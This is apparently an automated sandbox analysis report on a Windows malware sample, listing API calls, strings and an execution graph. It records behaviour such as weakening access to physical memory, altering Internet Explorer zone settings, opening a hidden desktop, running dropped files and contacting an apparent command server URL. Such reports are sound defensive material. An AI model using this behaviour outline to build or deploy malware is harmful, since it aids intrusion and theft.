                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            • Opcode ID: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction ID: 89d45d45e0a184fa7970b295066ffccd564a705ae1855cc5323f3f658fcd5c06
                            • Opcode Fuzzy Hash: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction Fuzzy Hash: 2A41EB71E4030DAFEB108FD4DC85BEEB7B9FB04319F50403AEA00BA191D7B9595A8B59
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • 1601, xrefs: 004050D4
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • yes, xrefs: 0040510E
                            • GlobalUserOffline, xrefs: 004050FA
                            • BrowseNewProcess, xrefs: 00405113
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            • Opcode ID: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction ID: cd0aaffbc0bd71aa605591c0976343fec0ffbebd6d6d4fedce8ce2f9217411d7
                            • Opcode Fuzzy Hash: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction Fuzzy Hash: 24F07DF2F883587EE710A1699C47F8D765907A1704FA400A7BA44B10C2D0FE56C6826D
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            • Opcode ID: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction ID: 67d25c2989ca0d32993d4aa71a0b11dc39683739a3ff9c0c7d6bcfde353c753a
                            • Opcode Fuzzy Hash: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction Fuzzy Hash: 6F318233E082149BDF21FB29ED848DA7726A751324715C43AE550B32B1DB787C91CB6E
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Yara matches
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Yara matches
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            APIs
                            Strings
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Strings
                            Yara matches
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39}, xrefs: 004017D5
                            Yara matches
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            APIs
                            Yara matches
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2
2957->2964 2965 402f6f IsBadReadPtr 2957->2965 2966 403059 CloseHandle 2957->2966 2958->2957 2960->2957 2961->2957 2962->2957 2963 4031b1 IsBadWritePtr 2962->2963 2963->2957 2964->2957 2965->2957 2966->2957 2967 407892 2968 40789e 2967->2968 2969 407910 2968->2969 2970 4078fe CallWindowProcA 2968->2970 2970->2969 3018 405133 10 API calls 3019 40429c 4 API calls 3018->3019 3020 405264 3019->3020 3021 405278 3020->3021 3022 40526b LocalFree 3020->3022 3024 40509b 6 API calls 3021->3024 3023 4054d0 3022->3023 3025 40527d ExpandEnvironmentStringsA 3024->3025 3044 404532 3025->3044 3028 4052d3 LocalFree 3028->3023 3029 4052ec strcat strcat 3030 40431f 4 API calls 3029->3030 3031 405315 memset 3030->3031 3032 405360 3031->3032 3033 40537c CreateProcessA 3031->3033 3032->3033 3034 4053ac CloseHandle sprintf 3033->3034 3043 405469 3033->3043 3036 405413 3034->3036 3035 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 3035->3023 3037 4053e5 FindWindowA 3036->3037 3038 40541d 3036->3038 3037->3038 3039 405402 Sleep 3037->3039 3040 405421 Sleep 3038->3040 3038->3043 3039->3036 3041 405434 Sleep 3040->3041 3042 40543e GetWindowTextA 3040->3042 3041->3042 3042->3043 3043->3035 3045 40453f 3044->3045 3046 403619 5 API calls 3045->3046 3047 404570 3046->3047 3048 404579 3047->3048 3049 404596 lstrlenA LocalAlloc GetTempPathA 3047->3049 3050 404589 LocalFree 3047->3050 3048->3028 3048->3029 3051 404604 3049->3051 3050->3048 3051->3051 3052 4015ea rand 3051->3052 3053 40461d strcat sprintf rand 3052->3053 3054 404655 strcat 3053->3054 3055 404668 rand 3053->3055 3054->3055 3056 40467a rand sprintf 3055->3056 3057 40469d rand 3055->3057 3056->3057 3058 4046bb strcat 3057->3058 3059 4046ce strcat rand 3057->3059 3058->3059 3060 4046f3 strcat 3059->3060 3061 404706 rand 3059->3061 3060->3061 3062 404741 sprintf rand 3061->3062 3063 40471e rand sprintf 3061->3063 3064 404770 strcat 3062->3064 3065 404783 strcat rand 3062->3065 3063->3062 3064->3065 3066 4047a8 strcat 
3065->3066 3067 4047bb strcat rand 3065->3067 3066->3067 3068 4047e6 rand sprintf 3067->3068 3069 404809 rand sprintf sprintf rand 3067->3069 3068->3069 3070 404859 rand sprintf 3069->3070 3071 40487c rand 3069->3071 3070->3071 3072 404894 strcat 3071->3072 3073 4048a7 rand 3071->3073 3072->3073 3074 4048b9 strcat 3073->3074 3075 4048cc rand 3073->3075 3074->3075 3076 4048f1 sprintf rand 3075->3076 3077 4048de strcat 3075->3077 3078 404926 strcat 3076->3078 3079 404939 rand 3076->3079 3077->3076 3078->3079 3080 40494b strcat 3079->3080 3081 40495e rand 3079->3081 3080->3081 3082 404976 rand sprintf 3081->3082 3083 404999 3081->3083 3082->3083 3087 4049a3 3083->3087 3110 404b12 3083->3110 3084 404b07 3086 404c87 strcat rand 3084->3086 3085 4043bf 2 API calls 3085->3110 3088 404cac strcat 3086->3088 3089 404cbf rand 3086->3089 3087->3084 3090 404a4b sprintf rand 3087->3090 3091 4049d9 sprintf 3087->3091 3088->3089 3092 404cd1 strcat 3089->3092 3093 404ce4 rand 3089->3093 3094 404a82 strcat 3090->3094 3095 404a95 rand 3090->3095 3091->3087 3092->3093 3097 404cf6 strcat 3093->3097 3098 404d09 strcat rand 3093->3098 3094->3095 3099 404aa7 strcat 3095->3099 3100 404aba rand 3095->3100 3096 404b47 sprintf 3096->3110 3097->3098 3101 404d34 rand sprintf 3098->3101 3102 404d57 rand 3098->3102 3099->3100 3100->3087 3103 404acc strcat 3100->3103 3101->3102 3104 404d69 strcat 3102->3104 3105 404d7c rand 3102->3105 3103->3087 3104->3105 3106 404da1 rand 3105->3106 3107 404d8e strcat 3105->3107 3108 404db9 strcat 3106->3108 3109 404dcc rand 3106->3109 3107->3106 3108->3109 3111 404e01 strcat rand 3109->3111 3112 404dde rand sprintf 3109->3112 3110->3085 3110->3086 3110->3096 3137 40447a lstrlenA LocalAlloc 3110->3137 3114 404e2c strcat 3111->3114 3115 404e3f strcat rand 3111->3115 3112->3111 3114->3115 3117 404e64 strcat 3115->3117 3118 404e77 strcat rand 3115->3118 3117->3118 3121 404ea2 strcat 3118->3121 3122 404eb5 sprintf rand 3118->3122 3119 404c02 rand 3123 404c14 strcat 
3119->3123 3124 404c27 rand 3119->3124 3120 404bef strcat 3120->3119 3121->3122 3127 404ee3 strcat 3122->3127 3128 404ef6 strcat rand 3122->3128 3123->3124 3125 404c39 strcat 3124->3125 3126 404c4c LocalFree 3124->3126 3125->3126 3126->3110 3127->3128 3129 404f27 strcat 3128->3129 3130 404f3a rand sprintf rand 3128->3130 3129->3130 3131 404f77 strcat 3130->3131 3132 404f8a strcat rand 3130->3132 3131->3132 3133 404fb5 strcat 3132->3133 3134 404fc8 rand 3132->3134 3133->3134 3135 404fda rand sprintf 3134->3135 3136 404ffd 7 API calls 3134->3136 3135->3136 3136->3048 3138 4044b6 3137->3138 3139 4044d9 sprintf 3138->3139 3140 40452a sprintf rand 3138->3140 3139->3138 3140->3119 3140->3120 3141 401b33 3144 401aa4 3141->3144 3142 401b13 3143 401ae6 sprintf 3146 40129c 3143->3146 3144->3142 3144->3143 3147 4012a9 CreateFileA 3146->3147 3148 4079e4 3146->3148 3149 4012db ReadFile CloseHandle 3147->3149 3150 4012d7 3147->3150 3148->3147 3149->3150 3150->3142 3151 4036b3 CreateFileA 3152 4036e3 3151->3152 3153 4036e7 SetFilePointer 3151->3153 3154 403701 3153->3154 3154->3154 3155 403708 WriteFile WriteFile CloseHandle 3154->3155 3155->3152 2761 406ff6 2762 4071a4 2761->2762 2763 40701f 2761->2763 2764 40717e 2762->2764 2765 4071be DestroyWindow 2762->2765 2766 407021 2763->2766 2767 40702f 2763->2767 2765->2764 2768 407184 2766->2768 2769 40702a 2766->2769 2770 407289 GetWindowTextA 2767->2770 2771 40703a 2767->2771 2768->2764 2774 407198 PostQuitMessage 2768->2774 2775 4077cc DefWindowProcA 2769->2775 2772 4072c9 GetWindowTextA 2770->2772 2773 4072a9 MessageBoxA SetFocus 2770->2773 2776 407041 2771->2776 2777 40705c 2771->2777 2778 407322 2772->2778 2779 407302 MessageBoxA SetFocus 2772->2779 2773->2764 2774->2764 2775->2764 2776->2769 2776->2775 2781 4071cb 2776->2781 2780 407149 2777->2780 2817 405ffa 2777->2817 2785 407337 MessageBoxA SetFocus 2778->2785 2794 407357 2778->2794 2779->2764 2780->2764 2824 406075 2780->2824 2781->2764 2787 407224 SetTextColor 2781->2787 
2789 407233 SetTextColor 2781->2789 2785->2764 2786 405ffa 3 API calls 2788 40709b GetWindowRect 2786->2788 2790 40723d SetBkColor CreateBrushIndirect 2787->2790 2788->2780 2791 4070be GetWindowRect 2788->2791 2789->2790 2790->2764 2791->2780 2793 4070d4 2791->2793 2792 4073a7 sprintf GetWindowTextA 2796 40740f sprintf GetWindowTextA 2792->2796 2797 4073ef MessageBoxA SetFocus 2792->2797 2793->2780 2800 407112 MoveWindow 2793->2800 2794->2792 2795 407376 MessageBoxA SetFocus 2794->2795 2795->2764 2798 407477 sprintf GetWindowTextA 2796->2798 2799 407457 MessageBoxA SetFocus 2796->2799 2797->2764 2801 4074d9 2798->2801 2802 4074b9 MessageBoxA SetFocus 2798->2802 2799->2764 2800->2780 2803 4074ee MessageBoxA SetFocus 2801->2803 2805 40750e 2801->2805 2802->2764 2803->2764 2804 40755e sprintf GetWindowTextA 2807 4075c6 2804->2807 2808 4075a6 MessageBoxA SetFocus 2804->2808 2805->2804 2806 40752d MessageBoxA SetFocus 2805->2806 2806->2764 2809 407627 sprintf CreateFileA SetFilePointer 2807->2809 2810 4075e5 MessageBoxA SetFocus 2807->2810 2808->2764 2811 40768e 2809->2811 2810->2764 2811->2811 2812 407695 WriteFile WriteFile 2811->2812 2813 4076db 2812->2813 2813->2813 2814 4076e2 6 API calls 2813->2814 2815 40776e 2814->2815 2815->2815 2816 407775 WriteFile WriteFile CloseHandle ShowWindow 2815->2816 2816->2764 2818 4079e4 2817->2818 2819 406007 GetWindow 2818->2819 2822 406020 2819->2822 2820 406028 GetClassNameA 2820->2822 2821 406024 2821->2786 2822->2820 2822->2821 2823 40605f GetWindow 2822->2823 2823->2822 2825 405ffa 3 API calls 2824->2825 2826 406096 2825->2826 2827 405ffa 3 API calls 2826->2827 2828 4060a3 10 API calls 2827->2828 2829 406224 SendMessageA 2828->2829 2830 40623a SendMessageA 2828->2830 2831 40624e CreateWindowExA CreateWindowExA 2829->2831 2830->2831 2832 406333 2831->2832 2833 4062cb sprintf SendMessageA sprintf SendMessageA 2832->2833 2834 40633c 34 API calls 2832->2834 2833->2832 2834->2764 2971 401219 2972 40121f __GetMainArgs 2971->2972 
2973 407980 173 API calls 2972->2973 2974 401284 exit 2973->2974 2975 40109a 2983 40109b 2975->2983 2976 40117f 2977 40118e signal 2976->2977 2978 4011a8 signal 2977->2978 2979 4011c9 2977->2979 2978->2979 2980 40117b 2978->2980 2979->2980 2981 4011ce signal raise 2979->2981 2981->2980 2983->2976 2983->2977 2983->2980 2984 40107a RtlUnwind 2983->2984 2984->2983 2835 40237b 2836 402333 _sleep 2835->2836 2837 402355 2835->2837 2838 401b9f 23 API calls 2836->2838 2839 40234c 2838->2839 2839->2836 2839->2837 2985 40109b 2986 40117f 2985->2986 2993 4010c3 2985->2993 2987 40118e signal 2986->2987 2988 4011a8 signal 2987->2988 2989 4011c9 2987->2989 2988->2989 2990 40117b 2988->2990 2989->2990 2991 4011ce signal raise 2989->2991 2991->2990 2993->2987 2993->2990 2994 40107a RtlUnwind 2993->2994 2994->2993 2995 40129b 2996 4079e4 2995->2996 2997 4012a9 CreateFileA 2996->2997 2998 4012db ReadFile CloseHandle 2997->2998 2999 4012d7 2997->2999 2998->2999 2711 40365e 2712 403664 GetFileSize LocalAlloc 2711->2712 2713 403684 ReadFile CloseHandle 2712->2713 2715 4036ae 2713->2715 2530 40121f __GetMainArgs 2533 407980 GetCommandLineA 2530->2533 2534 407991 strchr 2533->2534 2538 4079a6 2533->2538 2535 4079cf GetModuleHandleA 2534->2535 2534->2538 2539 406c29 OpenMutexA 2535->2539 2538->2535 2540 406c6d GetVersionExA GetSystemDirectoryA GetTickCount srand GetModuleFileNameA 2539->2540 2541 406c5f CloseHandle exit 2539->2541 2542 406cd6 2540->2542 2541->2540 2543 406ce4 rand 2542->2543 2544 406e07 9 API calls 2542->2544 2546 406d5f 2543->2546 2586 402e06 2544->2586 2548 406d69 rand 2546->2548 2549 406d2f rand 2546->2549 2550 406d8a sprintf CopyFileA 2548->2550 2551 406d7c 2548->2551 2549->2546 2563 403ce9 rand 2550->2563 2551->2550 2552 406f65 2602 4023a7 CreateThread CloseHandle 2552->2602 2553 406f2d GetModuleHandleA GetProcAddress GetCurrentProcessId 2553->2552 2557 406f6a CreateThread CloseHandle CreateThread CloseHandle SetTimer 2559 406fdc GetMessageA 2557->2559 2654 4068b0 
2557->2654 2672 40682b 2557->2672 2560 406fc4 TranslateMessage DispatchMessageA 2559->2560 2561 401284 exit 2559->2561 2560->2559 2564 403d27 2563->2564 2565 403d2e 2563->2565 2574 403f68 rand 2564->2574 2603 403619 CreateFileA 2565->2603 2568 403d47 memcpy memset 2570 403da1 rand rand rand rand memcpy 2568->2570 2571 403e64 2570->2571 2609 403bbe 2571->2609 2575 404002 2574->2575 2576 403fd4 rand 2575->2576 2577 404009 rand 2575->2577 2576->2575 2578 40402a 6 API calls 2577->2578 2579 40401c 2577->2579 2614 404148 RegCreateKeyExA 2578->2614 2579->2578 2581 4040f5 2582 404148 3 API calls 2581->2582 2583 404125 2582->2583 2584 404148 3 API calls 2583->2584 2585 40413a WinExec ExitProcess 2584->2585 2587 402e13 2586->2587 2617 402822 6 API calls 2587->2617 2589 402e1b GetVersion 2590 402e2e 2589->2590 2591 402e79 LoadLibraryA GetProcAddress 2590->2591 2601 402ef6 2590->2601 2591->2590 2592 4033ce GetVersion 2592->2552 2592->2553 2593 4030e5 GetModuleHandleA 2593->2601 2595 40314c VirtualQuery 2596 4031b1 IsBadWritePtr 2595->2596 2595->2601 2596->2601 2597 402f98 GlobalMemoryStatus 2597->2601 2598 402f6f IsBadReadPtr 2598->2601 2600 403059 CloseHandle 2600->2601 2601->2592 2601->2593 2601->2595 2601->2597 2601->2598 2601->2600 2618 40289a 2601->2618 2622 402cd7 2601->2622 2602->2557 2631 4022ee 2602->2631 2604 403664 GetFileSize LocalAlloc 2603->2604 2605 40364e 2603->2605 2606 403684 ReadFile CloseHandle 2604->2606 2605->2604 2608 4036ae 2605->2608 2606->2608 2608->2564 2608->2568 2611 403bfd 2609->2611 2610 403ce4 CreateFileA WriteFile CloseHandle LocalFree 2610->2564 2611->2610 2612 403c20 rand 2611->2612 2613 403c80 memset memcpy memcpy 2611->2613 2612->2611 2613->2611 2615 404193 2614->2615 2615->2615 2616 40419a RegSetValueExA RegCloseKey 2615->2616 2616->2581 2617->2589 2619 4028c6 GetSecurityInfo SetEntriesInAclA SetSecurityInfo CloseHandle 2618->2619 2621 4029cd 2619->2621 2621->2601 2623 402ceb 2622->2623 2625 402d13 2623->2625 2626 402a72 2623->2626 
2625->2601 2629 402a89 2626->2629 2627 402cd2 2627->2625 2628 402b2a GetModuleHandleA GetProcAddress 2628->2629 2629->2627 2629->2628 2630 402cad GetCurrentProcessId 2629->2630 2630->2629 2632 402333 _sleep 2631->2632 2636 401b9f 2632->2636 2652 4079e4 2636->2652 2653 4079e5 2652->2653 2653->2653 2669 4068c7 2654->2669 2656 406c0c _sleep 2656->2669 2657 403619 5 API calls 2657->2669 2659 406c01 LocalFree 2659->2656 2660 406941 sscanf 2661 406972 rand 2660->2661 2660->2669 2661->2669 2662 406a84 atoi 2665 406aad sprintf 2662->2665 2662->2669 2663 4069a4 sprintf sprintf 2666 406a27 DeleteFileA sprintf WinExec 2663->2666 2664 4069db GetWindowsDirectoryA sprintf strcat 2664->2666 2665->2669 2666->2669 2667 406add lstrlenA 2667->2669 2668 406b20 sprintf lstrlenA lstrlenA LocalAlloc 2668->2669 2669->2656 2669->2657 2669->2659 2669->2660 2669->2662 2669->2663 2669->2664 2669->2667 2669->2668 2670 406b9b lstrlenA 2669->2670 2671 406bbe CreateThread CloseHandle 2669->2671 2676 405f5b lstrlenA lstrlenA LocalAlloc 2669->2676 2681 4043bf 2669->2681 2670->2669 2671->2669 2673 40683b 2672->2673 2689 406753 CreateFileA 2673->2689 2687 407a04 2676->2687 2678 405f9b lstrlenA 2688 407a04 2678->2688 2680 405fb4 DeleteUrlCacheEntry CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2680->2669 2682 4043dc 2681->2682 2683 40441a 2682->2683 2685 4043e2 memcpy 2682->2685 2684 404441 lstrlenA 2683->2684 2686 40442f 2683->2686 2684->2686 2685->2686 2686->2669 2687->2678 2688->2680 2690 40678f GetFileSize CloseHandle 2689->2690 2696 40681a _sleep 2689->2696 2697 4013cc RegOpenKeyExA 2690->2697 2696->2673 2698 4013fa 2697->2698 2699 4013fe RegQueryValueExA RegCloseKey 2697->2699 2698->2696 2700 4054d7 6 API calls 2698->2700 2699->2698 2701 405586 2700->2701 2702 4055ce CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2701->2702 2703 40560e 2702->2703 2703->2696 2704 401348 RegCreateKeyExA 2703->2704 2705 